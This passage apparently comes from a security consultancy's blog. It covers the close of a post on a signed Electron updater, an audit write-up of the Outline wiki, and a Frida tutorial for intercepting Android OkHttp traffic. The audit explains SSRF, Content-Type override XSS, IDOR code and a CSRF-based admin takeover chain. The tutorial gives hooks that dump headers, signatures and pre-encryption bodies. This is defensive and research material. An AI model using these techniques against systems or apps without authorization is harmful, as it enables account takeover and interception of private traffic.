Call platform-specific installUpdate() logic:
- macOS: write feed JSON and trigger autoUpdater
Wait for user confirmation or automatically apply the update
Restart the application with the new version

Configuration

SafeUpdater is highly configurable through environment-based JSON files using the config package.

The primary configuration file config/default.json includes the following settings:

1. updatesPublicKey (required)

The Ed25519 public key used to verify update signatures. This key must be hex-encoded (64 hex characters).

{
  "updatesPublicKey": "<..>"
}

Note: You can generate the key using the generateKeys.js script from the tools folder:

node tools/generateKeys.js  # Outputs public.key
cat public.key

2. updatesUrl (required)

The base URL for your update server. SafeUpdater constructs paths for manifests and binaries automatically:

{
  "updatesUrl": "https://updates.yourcompany.com"
}

Path construction examples:

Releases manifest: ${updatesUrl}/releases/versions.json
Version metadata: ${updatesUrl}/releases/${version}/${version}.yml
Update binaries: ${updatesUrl}/releases/${version}/${filename}
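
As a quick illustration of the path layout above, the following sketch derives the three URLs from a base URL. The buildUpdateUrls helper is hypothetical and only mirrors the patterns listed; it is not taken from the SafeUpdater codebase.

```javascript
// Derive manifest, metadata and binary URLs from the configured base URL.
function buildUpdateUrls(updatesUrl, version, filename) {
  // Drop trailing slashes so the joined paths never contain "//".
  const base = updatesUrl.replace(/\/+$/, "");
  return {
    manifest: `${base}/releases/versions.json`,
    metadata: `${base}/releases/${version}/${version}.yml`,
    binary: `${base}/releases/${version}/${encodeURIComponent(filename)}`,
  };
}

const urls = buildUpdateUrls("https://updates.yourcompany.com/", "2.0.0", "my-app-2.0.0-mac.zip");
console.log(urls);
```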

3. updatesEnabled (required)

A master switch for the update system:

{
  "updatesEnabled": true
}

4. certificateAuthority (optional)

Provide a PEM-encoded X.509 certificate for TLS validation. This is useful for self-signed certificates during development or as part of a certificate pinning strategy in production.

{
  "certificateAuthority": "-----BEGIN CERTIFICATE-----\nMIIDXTCCAkWgAwIBAgIJAKL...\n-----END CERTIFICATE-----"
}

5. allowInsecureTLS (optional, default: false)

Disables TLS certificate validation.

{
  "allowInsecureTLS": true
}

Warning: Never use this in production! Only for development environments with self-signed certificates.
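
The two TLS settings map naturally onto the options accepted by Node's https module. The sketch below shows one way this could look; buildTlsOptions is a hypothetical helper, and how SafeUpdater actually wires these values into its HTTP client is an assumption.

```javascript
const https = require("node:https");

// Translate the updater configuration into Node TLS options.
function buildTlsOptions(config) {
  const options = {
    // Certificate validation stays on unless explicitly disabled.
    rejectUnauthorized: config.allowInsecureTLS !== true,
  };
  if (config.certificateAuthority) {
    // Supplying `ca` replaces Node's default trust store for this agent.
    options.ca = config.certificateAuthority;
  }
  return options;
}

const defaultOptions = buildTlsOptions({});
const pinnedOptions = buildTlsOptions({
  certificateAuthority: "-----BEGIN CERTIFICATE-----\n...\n-----END CERTIFICATE-----",
});
const insecureOptions = buildTlsOptions({ allowInsecureTLS: true });

// The options can then be passed to an agent used for update requests.
const agent = new https.Agent(defaultOptions);
console.log(defaultOptions, insecureOptions);
```

Because a custom `ca` replaces the default trust store, only certificates chaining to the configured authority are accepted, which is what makes it usable for pinning.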

6. downgradeEnabled (optional, default: false)

Enables the ability to roll back to a previous version of the app.

{
  "downgradeEnabled": true
}

Allows cryptographically verified downgrades and enforces a minimum version to prevent unsafe rollbacks.
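
The downgrade decision can be pictured as a small policy check. The sketch below is an assumption about how such a check might look: the minimumVersion option and both function names are hypothetical, and it only handles plain major.minor.patch versions.

```javascript
// Compare two "major.minor.patch" versions; returns -1, 0 or 1.
function compareVersions(a, b) {
  const pa = a.split(".").map(Number);
  const pb = b.split(".").map(Number);
  for (let i = 0; i < 3; i++) {
    const diff = (pa[i] || 0) - (pb[i] || 0);
    if (diff !== 0) return diff < 0 ? -1 : 1;
  }
  return 0;
}

// Decide whether `candidate` may replace `current` under the given policy.
function isVersionAllowed(current, candidate, policy) {
  const direction = compareVersions(candidate, current);
  if (direction === 0) return false; // same version, nothing to install
  if (direction > 0) return true; // regular upgrade
  if (!policy.downgradeEnabled) return false; // rollbacks are off by default
  // Hypothetical floor: never roll back below a known-safe version.
  return compareVersions(candidate, policy.minimumVersion) >= 0;
}

const policy = { downgradeEnabled: true, minimumVersion: "1.5.0" };
console.log(isVersionAllowed("2.0.0", "1.9.0", policy)); // rollback above the floor
console.log(isVersionAllowed("2.0.0", "1.4.9", policy)); // rollback below the floor
```

This check complements, rather than replaces, signature verification: a downgrade target still has to carry a valid signature for its own version.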

Update Server

For debugging purposes only, we have developed a set of tools under the /tools folder that cover everything required to generate Ed25519 key pairs, sign release artifacts, and produce signed manifests.

This repository allows developers to:

Generate a long-term Ed25519 key pair for signing releases.
Sign all application binaries, metadata, and manifest files.
Organize and host updates in a structured release directory, ensuring the updater can verify both the signature and integrity of every file.
Run a development HTTPS server to safely test update delivery before production.

Following the two-step process below ensures that end users only receive verified, unmodified updates, protecting against downgrade attacks, tampering, and malicious binaries.

1. Sign Version Manifest & Files

Sign release artifacts after building your application using electron-builder. It is crucial to sign every artifact that will be downloaded or trusted by the updater.

# Sign ZIP file
node tools/sign.js /path/to/my-app-2.0.0-mac.zip "2.0.0"

# Sign DMG file
node tools/sign.js /path/to/my-app-2.0.0.dmg "2.0.0"

# Sign YAML metadata
node tools/sign.js /path/to/2.0.0.yml "2.0.0"

2. Server Deployment

For local testing, you can serve updates over HTTPS using a self-signed certificate.

server.py:

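from http.server import HTTPServer, SimpleHTTPRequestHandler
import ssl

port = 443

httpd = HTTPServer(('0.0.0.0', port), SimpleHTTPRequestHandler)

# ssl.wrap_socket() was removed in Python 3.12, so wrap the socket
# through an explicit server-side SSLContext instead.
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(certfile='server.pem', keyfile='key.pem')
httpd.socket = context.wrap_socket(httpd.socket, server_side=True)

print(f"Server running on https://0.0.0.0:{port}")
httpd.serve_forever()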

This server is intended strictly for development and testing purposes. In production, deploy behind a properly secured, scalable, and monitored infrastructure.

Conclusion

Even when using modern and widely adopted frameworks, software update mechanisms must compensate for several shortcomings introduced by the underlying operating systems themselves. These limitations place a non-trivial burden on application developers, who are often forced to re-implement critical security guarantees that should ideally be enforced at the platform level.

This project set out to analyze the current limitations of software update mechanisms in ElectronJS and to propose a safer alternative to the approaches commonly used today. By providing strong cryptographic guarantees and a well-defined, transparent update flow, our reference implementation (SafeUpdater) aims to reduce the attack surface associated with software updates and to make secure design choices the default rather than an afterthought. In doing so, it allows developers to focus on building application features without compromising on update security.

SafeUpdater was developed as part of my university thesis at the Polytechnic University of Valencia and during my internship at Doyensec. While the project would still require extensive performance evaluation, security auditing, and real-world testing before being considered production-ready, we believe it offers a solid foundation and a practical starting point for building more robust and trustworthy software update mechanisms for ElectronJS-based applications.

Auditing Outline. Firsthand lessons from comparing manual testing and AI security platforms

2026-02-03T00:00:00+01:00

In July 2025, we performed a brief audit of Outline - an OSS wiki similar in many ways to Notion. This activity was meant to evaluate the overall posture of the application, and involved two researchers for a total of 60 person-days. In parallel, we thought it would be a valuable firsthand experience to use three AI security platforms to perform an audit on the very same codebase. Given that all issues are now fixed, we believe it would be interesting to provide an overview of our effort and a few interesting findings and considerations.

"Generate an image that well describes the content of this blog post"

Disclaimer: Outline

While this activity was not sufficient to evaluate the entirety of the Outline codebase, we believe we have a good understanding of its quality and resilience. The security posture of the APIs was found to be above industry best practices. Despite our findings, we were pleased to witness a well-thought-out use of security practices and hardening, especially given the numerous functionalities and integrations available.

It is important to note that Doyensec audited only Outline OSS (v0.85.1). On-premise enterprise and cloud functionalities were considered out of scope for this engagement. For instance, multi-tenancy is not supported in the OSS on-prem release, hence authorization testing did not consider cross-tenant privilege escalations. Finally, testing focused on Outline code only, leaving all dependencies out of scope. Ironically, several of the bugs discovered were actually caused by external libraries.

Disclaimer: AI platforms evaluated during this dry run

Large Language Models and AI security platforms are evolving at an exceptionally rapid pace. The observations, assessments, and experiences shared in this post reflect our hands-on exposure at a specific point in time and within a particular technical context. As models, tooling, and defensive capabilities continue to mature, some details discussed here may change or become irrelevant.

Instrumentation

When performing an in-depth engagement, it is ideal to set up a testing environment with debugging capabilities for both frontend and backend. Outline’s extensive documentation makes this process easy.

We started by setting up a local environment as documented in this guide, and executing the following commands:

echo "127.0.0.1 local.outline.dev" | sudo tee -a /etc/hosts
mkdir files

The following .env file was used for the configuration (non-empty settings only):

NODE_ENV=development
URL=https://local.outline.dev:3000
PORT=3000
SECRET_KEY=09732bbde65d4...989
UTILS_SECRET=af7b3d5a6cc...2f1
DEFAULT_LANGUAGE=en_US
DATABASE_URL=postgres://user:pass@127.0.0.1:5432/outline
REDIS_URL=redis://127.0.0.1:6379
FILE_STORAGE=local
FILE_STORAGE_LOCAL_ROOT_DIR=./files/
FILE_STORAGE_UPLOAD_MAX_SIZE=262144000
FORCE_HTTPS=true
OIDC_CLIENT_ID=web
OIDC_CLIENT_SECRET=secret
OIDC_AUTH_URI=http://127.0.0.1:9998/auth
OIDC_TOKEN_URI=http://127.0.0.1:9998/oauth/token
OIDC_USERINFO_URI=http://127.0.0.1:9998/userinfo
OIDC_DISABLE_REDIRECT=true
OIDC_USERNAME_CLAIM=preferred_username
OIDC_DISPLAY_NAME=OpenID Connect
OIDC_SCOPES=openid profile email
RATE_LIMITER_ENABLED=true
# –––––––––––––  DEBUGGING  ––––––––––––
ENABLE_UPDATES=false
DEBUG=http
LOG_LEVEL=debug

Zitadel’s OIDC server was used for authentication:

REDIRECT_URI=https://local.outline.dev:3000/auth/oidc.callback USERS_FILE=./users.json go run github.com/zitadel/oidc/v3/example/server

Finally, VS Code debugging was set up using the following .vscode/launch.json:

{
  "version": "0.2.0",
  "configurations": [
    {
      "type": "node",
      "request": "attach",
      "name": "Attach to Outline Backend",
      "address": "localhost",
      "port": 9229,
      "restart": true,
      "protocol": "inspector",
      "skipFiles": ["<node_internals>/**"],
      "cwd": "${workspaceFolder}"
    }
  ]
} 

We also facilitated front-end debugging by adding the following setting at the top of the .babelrc file in order to have source maps.

"sourceMaps": true

Findings

Doyensec researchers discovered and reported seven (7) unique vulnerabilities affecting Outline OSS.

ID	Title	Class	Severity	Discoverer
OUT-Q325-01	Multiple Blind SSRF	SSRF	Medium	🤖🙍‍♂️
OUT-Q325-02	Vite Path Traversal	Injection Flaws	Low	🙍‍♂️
OUT-Q325-03	CSRF via Sibling Domains	CSRF	Medium	🙍‍♂️
OUT-Q325-04	Local File Storage CSP Bypass	Insecure Design	Low	🙍‍♂️
OUT-Q325-05	Insecure Comparison in VerificationCode	Insufficient Cryptography	Low	🤖🙍‍♂️
OUT-Q325-06	ContentType Bypass	Insecure Design	Medium	🙍‍♂️
OUT-Q325-07	Event Access	IDOR	Low	🤖

Among the bugs we discovered, there are a few that require special mention:

OUT-Q325-01 (GHSA-jfhx-7phw-9gq3) is a standard Server-Side Request Forgery bug that allows redirects but supports only a limited set of protocols. Interestingly, this issue affects the self-hosted version only, as the cloud release is protected using request-filtering-agent. While taking a quick look at this dependency, we realized that versions 1.x.x and earlier contained a vulnerability (GHSA-pw25-c82r-75mm) where HTTPS requests to 127.0.0.1 bypass IP address filtering, while HTTP requests are correctly blocked. Although newer versions of the library were already out, Outline was still using an old release, since no GitHub (or other) advisories had ever been created for this issue. Whether intentionally or accidentally, the fix had remained silent for many years.

OUT-Q325-02 (GHSA-pp7p-q8fx-2968) turned out to be a bug in the vite-plugin-static-copy npm module. Luckily, it only affects Outline in development mode.

OUT-Q325-04 (GHSA-gcj7-c9jv-fhgf) was already exploited in this type confusion attack. In fact, browsers like Chrome and Firefox do not block script execution even if the script is served with Content-Disposition: attachment, as long as the content type is a valid application/javascript. Please note that this issue does not affect the cloud-hosted version, since it does not use the local file storage engine at all.

Investigating this issue led to the discovery of OUT-Q325-06, an even more interesting issue.

Outline allows inline content for specific (safe) types of files, as defined in server/storage/files/BaseStorage.ts:

  /**
   * Returns the content disposition for a given content type.
   *
   * @param contentType The content type
   * @returns The content disposition
   */
  public getContentDisposition(contentType?: string) {
    if (!contentType) {
      return "attachment";
    }

    if (
      FileHelper.isAudio(contentType) ||
      FileHelper.isVideo(contentType) ||
      this.safeInlineContentTypes.includes(contentType)
    ) {
      return "inline";
    }

    return "attachment";
  }

Despite this logic, the actual content type of the response was getting overridden. All Outline versions before v0.84.0 (May 2025) were actually vulnerable to Cross-Site Scripting because of this issue, and it was accidentally mitigated by adding the following CSP directive:

ctx.set("Content-Security-Policy","sandbox");

When analyzing the root cause, it turned out to be an undocumented insecure behavior of KoaJS.

In Outline, the issue was caused by forcing the expected “Content-Type” before the use of response.attachment([filename], [options]).

ctx.set("Content-Type", contentType);
ctx.attachment(fileName, {
      type: forceDownload
        ? "attachment"
        : FileStorage.getContentDisposition(contentType), // this applies the safe allowed-list
    });

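In fact, when a filename is provided, the attachment function unexpectedly assigns the response type based on the file extension, which invokes the following setter and overwrites any Content-Type set earlier:

set type (type) {
  type = getType(type)
  if (type) {
    this.set('Content-Type', type)
  } else {
    this.remove('Content-Type')
  }
},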

This insecure behavior is neither documented nor warned against by the framework. Swapping the order of the two calls, so that ctx.set runs after ctx.attachment, is sufficient to fix the issue.
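
The effect of the call order can be reproduced with a tiny stand-in for the response object. The sketch below is a simplified model written for illustration, not Koa itself: ModelResponse, its MIME table, and the file name are all hypothetical, and only the override side effect described above is mimicked.

```javascript
// Minimal MIME lookup for the model (the real framework uses a full database).
const MIME_BY_EXTENSION = {
  ".html": "text/html; charset=utf-8",
  ".png": "image/png",
};

function extensionOf(filename) {
  const dot = filename.lastIndexOf(".");
  return dot === -1 ? "" : filename.slice(dot).toLowerCase();
}

// Stand-in for a Koa-like response (model only).
class ModelResponse {
  constructor() {
    this.headers = {};
  }
  set(name, value) {
    this.headers[name] = value;
  }
  remove(name) {
    delete this.headers[name];
  }
  // Mimics the side effect: the file extension decides the Content-Type.
  attachment(filename, options = {}) {
    const type = MIME_BY_EXTENSION[extensionOf(filename)];
    if (type) this.set("Content-Type", type);
    else this.remove("Content-Type");
    this.set("Content-Disposition", `${options.type || "attachment"}; filename="${filename}"`);
  }
}

// Vulnerable order: the forced, safe type is silently replaced.
const vulnerable = new ModelResponse();
vulnerable.set("Content-Type", "image/png");
vulnerable.attachment("payload.html", { type: "inline" });

// Fixed order: the forced type is applied last and therefore wins.
const fixed = new ModelResponse();
fixed.attachment("payload.html", { type: "inline" });
fixed.set("Content-Type", "image/png");

console.log(vulnerable.headers["Content-Type"], "|", fixed.headers["Content-Type"]);
```

In the vulnerable order, a file stored with a safe content type but an .html name ends up served inline as HTML, which is the kind of mismatch behind the bypass.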

Combining OUT-Q325-03, OUT-Q325-06 and Outline’s sharing capabilities, it is possible to take over an admin account, as shown in the following video, affecting the latest version of Outline at the time of testing:

Your browser does not support the video tag.

Finally, OUT-Q325-07 (GHSA-h9mv-vg9r-8c7c) was discovered autonomously by a security AI platform. The events.list API endpoint contains an IDOR vulnerability allowing users to view events for any actor or document within their team without proper authorization.

router.post(
  "events.list",
  auth(),
  pagination(),
  validate(T.EventsListSchema),
  async (ctx: APIContext<T.EventsListReq>) => {
    const { user } = ctx.state.auth;
    const {
      name,
      events,
      auditLog,
      actorId,
      documentId,
      collectionId,
      sort,
      direction,
    } = ctx.input.body;

    let where: WhereOptions<Event> = {
      teamId: user.teamId,
    };

    if (auditLog) {
      authorize(user, "audit", user.team);
      where.name = events
        ? intersection(EventHelper.AUDIT_EVENTS, events)
        : EventHelper.AUDIT_EVENTS;
    } else {
      where.name = events
        ? intersection(EventHelper.ACTIVITY_EVENTS, events)
        : EventHelper.ACTIVITY_EVENTS;
    }

    if (name && (where.name as string[]).includes(name)) {
      where.name = name;
    }

    if (actorId) {
      where = { ...where, actorId };
    }

    if (documentId) {
      where = { ...where, documentId };
    }

    if (collectionId) {
      where = { ...where, collectionId };

      const collection = await Collection.findByPk(collectionId, {
        userId: user.id,
      });
      authorize(user, "read", collection);
    } else {
      const collectionIds = await user.collectionIds({
        paranoid: false,
      });
      where = {
        ...where,
        [Op.or]: [
          {
            collectionId: collectionIds,
          },
          {
            collectionId: {
              [Op.is]: null,
            },
          },
        ],
      };
    }

    const loadedEvents = await Event.findAll({
      where,
      order: [[sort, direction]],
      include: [
        {
          model: User,
          as: "actor",
          paranoid: false,
        },
      ],
      offset: ctx.state.pagination.offset,
      limit: ctx.state.pagination.limit,
    });

    ctx.body = {
      pagination: ctx.state.pagination,
      data: await Promise.all(
        loadedEvents.map((event) => presentEvent(event, auditLog))
      ),
    };
  }
);

While the code implements team-level isolation (via the teamId check) and collection-level authorization, it fails to validate access to individual events. An attacker can manipulate the actorId or documentId parameters to view events they shouldn’t have access to. This is particularly concerning since audit log events might contain sensitive information (e.g., document titles). This is a nice catch, something that is not immediately evident to a human auditor without an extended understanding of Outline’s authorization model.
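
One possible shape of a fix is to authorize every caller-supplied filter before it reaches the query. The following sketch uses an in-memory model rather than Outline's real models or policies: the documents map, authorizeDocumentRead, buildEventsFilter, and the admin-only rule for actorId are all assumptions made for illustration.

```javascript
// Hypothetical data: which users may read which documents.
const documents = new Map([
  ["doc-shared", { readers: new Set(["alice", "bob"]) }],
  ["doc-private", { readers: new Set(["alice"]) }],
]);

class AuthorizationError extends Error {}

// Throws unless the user can read the referenced document.
function authorizeDocumentRead(userId, documentId) {
  const doc = documents.get(documentId);
  if (!doc || !doc.readers.has(userId)) {
    throw new AuthorizationError("forbidden");
  }
}

// Build the query filter, checking each user-controlled parameter first.
function buildEventsFilter(user, { actorId, documentId }) {
  let where = { teamId: user.teamId };
  if (documentId) {
    authorizeDocumentRead(user.id, documentId);
    where = { ...where, documentId };
  }
  if (actorId) {
    // Assumed policy: only admins may list another user's events.
    if (actorId !== user.id && !user.isAdmin) {
      throw new AuthorizationError("forbidden");
    }
    where = { ...where, actorId };
  }
  return where;
}

const bob = { id: "bob", teamId: "team-1", isAdmin: false };
const allowedFilter = buildEventsFilter(bob, { documentId: "doc-shared" });

let deniedReason = null;
try {
  buildEventsFilter(bob, { documentId: "doc-private" });
} catch (err) {
  deniedReason = err.message;
}
console.log(allowedFilter, deniedReason);
```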

On the Use of AI tools

Despite the discovery of OUT-Q325-07, our experience using three AI security platforms was, overall, rather disappointing. LLM-based models can identify some vulnerabilities; however, the rate of false positives vastly outweighed the few true positives. What made this especially problematic was how convincing the findings were: the descriptions of the alleged issues were often extremely accurate and well-articulated, making it surprisingly hard to confidently dismiss them as false positives. As a result, cleaning up and validating all AI-reported issues turned into a 40-hour effort.

Such overhead during a paid manual audit is hard to justify for us and, more importantly, for our clients. AI hallucinations repeatedly sent us down unexpected rabbit holes, at times making seasoned consultants, with decades of combined experience, feel like complete newbies. While attempting to validate alleged bugs reported by AI, we found ourselves second-guessing our own judgment, losing valuable time that could have been spent on higher-impact tasks.

While the future undoubtedly involves LLMs, it is not quite here yet for high-quality security engagements targeting popular, well-audited software. At Doyensec, we will continue to explore and experiment with AI-assisted tooling, adopting it when and where it actually adds value. We don’t want to be remembered as anti-AI hypers but we’re equally not interested in outsourcing our expertise to confident-sounding hallucinations. For now, human intuition, experience, and skepticism - combined with top-notch tooling - remain very hard to beat. Challenge us!

Intercepting OkHttp at Runtime With Frida - A Practical Guide

2026-01-22T00:00:00+01:00

Introduction

OkHttp is the de facto standard HTTP client library for the Android ecosystem. It is therefore crucial for a security analyst to be able to dynamically eavesdrop on the traffic generated by this library during testing. While it might seem easy, this task is far from trivial. Every request goes through a series of mutations between the initial request creation and the moment it is transmitted. Therefore, a single injection point might not be enough to get a full picture. One injection point is needed to find out what is actually going over the wire, while another might be required to understand the initial payload being sent.

In this tutorial we will demonstrate the architecture and the most interesting injection points that can be used to eavesdrop on and modify OkHttp requests.

Premise

For the purpose of demonstration, I built a simple APK with a flow similar to the app I recently tested. It first creates a Request with a JSON payload. Then, a couple of interceptors perform the following operations:

Add an authorization header
Calculate the payload signature, adding that as a header
Encrypt the JSON payload and switch the body to the encrypted version

Looking at this flow, it becomes obvious that reversing the actual application protocol isn’t straightforward. Intercepting requests at the moment of actual sending will yield the actual payload being sent over the wire; however, it will obscure the JSON payload. Intercepting the request creation, on the other hand, will reveal the actual JSON, but will not reveal the custom HTTP headers or the authentication token, nor will it allow replaying the request.

In the following examples, I’ll demonstrate two approaches that can be mixed and matched for a full picture. Firstly, I will hook the RealCall functions and dump the Request from there. Then, I will demonstrate how to follow the consecutive Request mutations done by the Interceptors. However, in real-life scenarios hooking every Interceptor implementation might be impractical, especially in obfuscated applications. Instead, I’ll demonstrate how to observe intercept results from the internal RealInterceptorChain.proceed function.

Helper Functions

To reliably print the contents of the requests, one needs to prepare the helper functions first. Assuming we have an okhttp3.Request object available, we can use Frida to dump its contents:

function dumpRequest(req, function_name) {
    try {
        console.log("\n=== " + function_name + " ===");
        console.log("method: " + req.method());
        console.log("url: " + req.url().toString());
        console.log("-- headers --");
        dumpHeaders(req);
        dumpBody(req);
        console.log("=== END ===\n");
    } catch (e) {
        console.log("dumpRequest failed: " + e);
    }
}

Dumping headers requires iterating through the Header collection:

function dumpHeaders(req) {
    try {
        // Fetch the headers inside the try block so a failing call is reported
        const headers = req.headers();
        if (!headers) return;

        const n = headers.size();
        for (let i = 0; i < n; i++) {
            console.log(headers.name(i) + ": " + headers.value(i));
        }
    } catch (e) {
        console.log("dumpHeaders failed: " + e);
    }
}

Dumping the body is the hardest task, as there might be many different RequestBody implementations. However, in practice the following should usually work:

function dumpBody(req) {
    const body = req.body();
    if (body) {
        const ct = body.contentType();
        console.log("-- body meta --");
        console.log("contentType: " + (ct ? ct.toString() : "(null)"));
        try {
            console.log("contentLength: " + body.contentLength());
        } catch (_) {
            console.log("contentLength: (unknown)");
        }

        const utf8 = readBodyToUtf8(body);
        if (utf8 !== null) {
            console.log("-- body (utf8) --");
            console.log(utf8);
        } else {
            console.log("-- body -- (not readable: streaming/one-shot/duplex or custom)");
        }
    } else {
        console.log("-- no body --");
    }
}

The code above uses another helper function to read the actual bytes from the body and decode them as UTF-8. It does so by utilizing the okio.Buffer class:

function readBodyToUtf8(reqBody) {
    try {
        if (!reqBody) return null;

        const Buffer = Java.use("okio.Buffer");
        const buf = Buffer.$new();

        reqBody.writeTo(buf);

        const out = buf.readUtf8();
        return out;
    } catch (e) {
        return null;
    }
}

RealCall

Now that we have code capable of dumping the request as text, we need to find a reliable way to catch the requests. When attempting to view an outgoing communication, the first instinct is to try to hook the function called to send the request. In the world of OkHttp, the functions closest to this are RealCall.execute() and RealCall.enqueue():

Java.perform(function () {
    // OkHttp 4.x location; OkHttp 3.x ships this class as okhttp3.RealCall
    const RealCall = Java.use("okhttp3.internal.connection.RealCall");

    try {
        // Keep a reference to the overload itself, so the original method
        // can be invoked from inside the replacement without recursing
        const execOv = RealCall.execute.overload();
        execOv.implementation = function () {
            dumpRequest(this.request(), "RealCall.execute() about to send");
            return execOv.call(this);
        };
        console.log("[+] Hooked RealCall.execute()");
    } catch (e) {
        console.log("[-] Failed to hook RealCall.execute(): " + e);
    }

    try {
        const enqOv = RealCall.enqueue.overload("okhttp3.Callback");
        enqOv.implementation = function (cb) {
            dumpRequest(this.request(), "RealCall.enqueue()");
            return enqOv.call(this, cb);
        };
        console.log("[+] Hooked RealCall.enqueue(Callback)");
    } catch (e) {
        console.log("[-] Failed to hook RealCall.enqueue(): " + e);
    }
});

However, after running these hooks, it becomes clear that this approach is insufficient whenever an application uses interceptors:

frida -U -p $(adb shell pidof com.doyensec.myapplication) -l blogpost/request-body.js
     ____
    / _  |   Frida 17.5.1 - A world-class dynamic instrumentation toolkit
   | (_| |
    > _  |   Commands:
   /_/ |_|       help      -> Displays the help system
   . . . .       object?   -> Display information about 'object'
   . . . .       exit/quit -> Exit
   . . . .
   . . . .   More info at https://frida.re/docs/home/
   . . . .
   . . . .   Connected to CPH2691 (id=8c5ca5b0)
Attaching...
[+] Using okhttp3.internal.connection.RealCall
[+] Hooked RealCall.execute()
[+] Hooked RealCall.enqueue(Callback)
[*] Non-obfuscated RealCall hooks installed.
[CPH2691::PID::9358 ]->
=== RealCall.enqueue() about to send ===
method: POST
url: https://tellico.fun/endpoint
-- headers --
-- body meta --
contentType: application/json; charset=utf-8
contentLength: 60
-- body (utf8) --
{
  "hello": "world",
  "poc": true,
  "ts": 1768598890661
}
=== END ===

As can be observed, this approach was useful to disclose the address and the JSON payload. However, the request is far from complete. The custom and authentication headers are missing, and the analyst cannot observe that the payload is later encrypted, making it impossible to infer the full application protocol. Therefore, we need to find a more comprehensive method.

Intercepting Interceptors

Since the modifications are performed inside the OkHttp Interceptors, our next injection target will be the okhttp3.internal.http.RealInterceptorChain class. Given that this is an internal class, it’s bound to be less stable than regular OkHttp classes. Therefore, instead of hooking a function with a single signature, we’ll iterate over all overloads of RealInterceptorChain.proceed:

const Chain = Java.use("okhttp3.internal.http.RealInterceptorChain");
console.log("[+] Found okhttp3.internal.http.RealInterceptorChain");

if (Chain.proceed) {
    const ovs = Chain.proceed.overloads;
    for (let i = 0; i < ovs.length; i++) {
        const proceed_overload = ovs[i];
        console.log("[*] Hooking RealInterceptorChain.proceed overload: " + proceed_overload.argumentTypes.map(t => t.className).join(", "));
        proceed_overload.implementation = function () {
            // implementation override here
        };
    }
    console.log("[+] Hooked RealInterceptorChain.proceed(*)");
} else {
    console.log("[-] RealInterceptorChain.proceed not found (unexpected)");
}

To understand the code inside the implementation, we need to understand how the proceed function works. The RealInterceptorChain class maintains the entire chain. When proceed is called by the library (or by the previous Interceptor), the this.index value is incremented and the next Interceptor is taken from the collection and applied to the Request. Therefore, at the moment of the proceed call, the Request is in the state produced by the previous Interceptor call. So, in order to attribute each Request state to the right Interceptor, we’ll need to take the name of the Interceptor at position index - 1:

proceed_overload.implementation = function () {
    // First arg is Request in all proceed overloads.
    const req = arguments[0];
    // Get current index
    const idx = this.index.value;
    // Get previous interceptor name 
    // Previous interceptor is the one responsible for the current req state
    var interceptorName = "";
    if (idx == 0) {
        interceptorName = "Original request";
    } else {
        interceptorName = "Interceptor " + this.interceptors.value.get(idx-1).getClass().getName();
    }
    dumpRequest(req, interceptorName);
    // Call the actual proceed
    return proceed_overload.apply(this, arguments);
};
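
The index - 1 attribution is easier to see in a toy model that runs outside of Frida. The sketch below is a simplified stand-in for the chain, not OkHttp's real classes: ModelChain, headerAdding, and the observed array are hypothetical names, and the end-of-chain branch merely replaces the network call.

```javascript
// Everything the "hook" sees is recorded here.
const observed = [];

// Simplified interceptor chain (model only).
class ModelChain {
  constructor(interceptors, index) {
    this.interceptors = interceptors;
    this.index = index;
  }

  proceed(request) {
    // Hook point: the incoming request was produced by the interceptor
    // at index - 1, or by the caller when index is 0.
    const producedBy = this.index === 0
      ? "Original request"
      : "Interceptor " + this.interceptors[this.index - 1].name;
    observed.push({ producedBy, headers: Object.keys(request.headers) });

    if (this.index >= this.interceptors.length) {
      return { code: 200 }; // end of the chain: pretend the request was sent
    }
    const next = new ModelChain(this.interceptors, this.index + 1);
    return this.interceptors[this.index].intercept(next, request);
  }
}

// Factory for an interceptor that adds a single header and continues.
function headerAdding(name, header, value) {
  return {
    name,
    intercept(chain, request) {
      const mutated = { ...request, headers: { ...request.headers, [header]: value } };
      return chain.proceed(mutated);
    },
  };
}

const interceptors = [
  headerAdding("HeaderInterceptor", "X-PoC", "frida-test"),
  headerAdding("SignatureInterceptor", "X-Signature", "example-signature"),
];
new ModelChain(interceptors, 0).proceed({ url: "https://tellico.fun/endpoint", headers: {} });

for (const entry of observed) {
  console.log(entry.producedBy + " -> [" + entry.headers.join(", ") + "]");
}
```

Each recorded entry pairs a request state with the interceptor that produced it, which is the same attribution the hook performs.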

The example result will look similar to the following:

[*] Hooking RealInterceptorChain.proceed overload: okhttp3.Request
[+] Hooked RealInterceptorChain.proceed(*)
[+] Hooked okhttp3.Interceptor.intercept(Chain)
[*] RealCall hooks installed.
[CPH2691::PID::19185 ]->
=== RealCall.enqueue() ===
method: POST
url: https://tellico.fun/endpoint
-- headers --
-- body meta --
contentType: application/json; charset=utf-8
contentLength: 60
-- body (utf8) --
{
  "hello": "world",
  "poc": true,
  "ts": 1768677868986
}
=== END ===


=== Original request ===
method: POST
url: https://tellico.fun/endpoint
-- headers --
-- body meta --
contentType: application/json; charset=utf-8
contentLength: 60
-- body (utf8) --
{
  "hello": "world",
  "poc": true,
  "ts": 1768677868986
}
=== END ===


=== Interceptor com.doyensec.myapplication.MainActivity$HeaderInterceptor ===
method: POST
url: https://tellico.fun/endpoint
-- headers --
X-PoC: frida-test
X-Device: android
Content-Type: application/json
-- body meta --
contentType: application/json; charset=utf-8
contentLength: 60
-- body (utf8) --
{
  "hello": "world",
  "poc": true,
  "ts": 1768677868986
}
=== END ===


=== Interceptor com.doyensec.myapplication.MainActivity$SignatureInterceptor ===
method: POST
url: https://tellico.fun/endpoint
-- headers --
X-PoC: frida-test
X-Device: android
Content-Type: application/json
X-Signature: 736c014442c5eebe822c1e2ecdb97c5d
-- body meta --
contentType: application/json; charset=utf-8
contentLength: 60
-- body (utf8) --
{
  "hello": "world",
  "poc": true,
  "ts": 1768677868986
}
=== END ===


=== Interceptor com.doyensec.myapplication.MainActivity$EncryptBodyInterceptor ===
method: POST
url: https://tellico.fun/endpoint
-- headers --
X-PoC: frida-test
X-Device: android
Content-Type: application/json
X-Signature: 736c014442c5eebe822c1e2ecdb97c5d
X-Content-Encryption: AES-256-GCM
X-Content-Format: base64(iv+ciphertext+tag)
-- body meta --
contentType: application/octet-stream
contentLength: 120
-- body (utf8) --
YIREhdesuf1VdvxeCO+H/8/N8NYFJ2r5Jk4Im40fjyzVI2rzufpejFOHQ67hkL8UFdniknpABmjoP73F2Z4Vbz3sPAxOp7ZXaz5jWLlk3T6B5sm2QCAjKA==
=== END ===

...

With such output we can easily observe the consecutive mutations of the request: the initial payload, the custom headers being added, the X-Signature being added and finally, the payload encryption. With the proper Interceptor names an analyst also receives strong signals as to which classes to target in order to reverse-engineer these operations.

